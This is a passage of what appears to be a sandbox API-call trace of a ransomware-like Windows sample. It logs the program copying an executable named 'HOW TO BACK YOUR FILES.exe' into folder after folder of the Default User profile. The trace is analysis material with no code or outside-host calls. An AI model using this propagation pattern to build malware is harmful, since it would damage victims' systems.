FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.723] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.723] GetLastError () returned 0x0 [0065.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.723] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.723] CloseHandle (hObject=0x120) returned 1 [0065.723] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.723] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.723] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.723] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.723] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.723] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319158 | out: hHeap=0x2b0000) returned 1 [0065.723] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.723] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned 93 [0065.723] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.723] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.723] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.724] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.724] GetLastError () returned 0x0 [0065.724] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.724] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.724] CloseHandle (hObject=0x120) returned 1 [0065.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.724] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.724] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.724] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.724] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.725] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0065.725] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.725] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned 108 [0065.725] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.725] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.725] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.725] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.725] GetLastError () returned 0x0 [0065.725] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.725] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.726] CloseHandle (hObject=0x120) returned 1 [0065.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.726] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.726] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.726] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.726] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.726] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 114 [0065.726] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.726] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.726] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.727] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.727] GetLastError () returned 0x0 [0065.727] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.727] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.727] CloseHandle (hObject=0x120) returned 1 [0065.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.727] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.727] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.727] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.727] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.727] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0065.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0065.727] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 123 [0065.727] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.728] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.728] GetLastError () returned 0x0 [0065.728] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.728] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.728] CloseHandle (hObject=0x120) returned 1 [0065.728] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.728] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.728] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.729] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.729] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5f98 | out: hHeap=0x2b0000) returned 1 [0065.729] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0065.729] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned 98 [0065.729] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.729] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.730] GetLastError () returned 0x0 [0065.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.730] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.730] CloseHandle (hObject=0x120) returned 1 [0065.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.730] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.730] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.730] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.730] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.730] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319090 | out: hHeap=0x2b0000) returned 1 [0065.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.730] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned 92 [0065.730] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.730] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.731] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.731] GetLastError () returned 0x0 [0065.731] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.731] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.731] CloseHandle (hObject=0x120) returned 1 [0065.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.731] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.731] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4330 | out: hHeap=0x2b0000) returned 1 [0065.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0065.732] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 101 [0065.732] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.732] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.732] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.732] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.732] GetLastError () returned 0x0 [0065.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.732] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.733] CloseHandle (hObject=0x120) returned 1 [0065.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.733] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.733] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.733] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.733] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.733] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default 